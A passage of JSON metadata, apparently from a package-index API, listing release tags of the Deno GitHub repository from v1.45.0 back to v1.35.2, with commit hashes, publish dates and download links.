s/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denol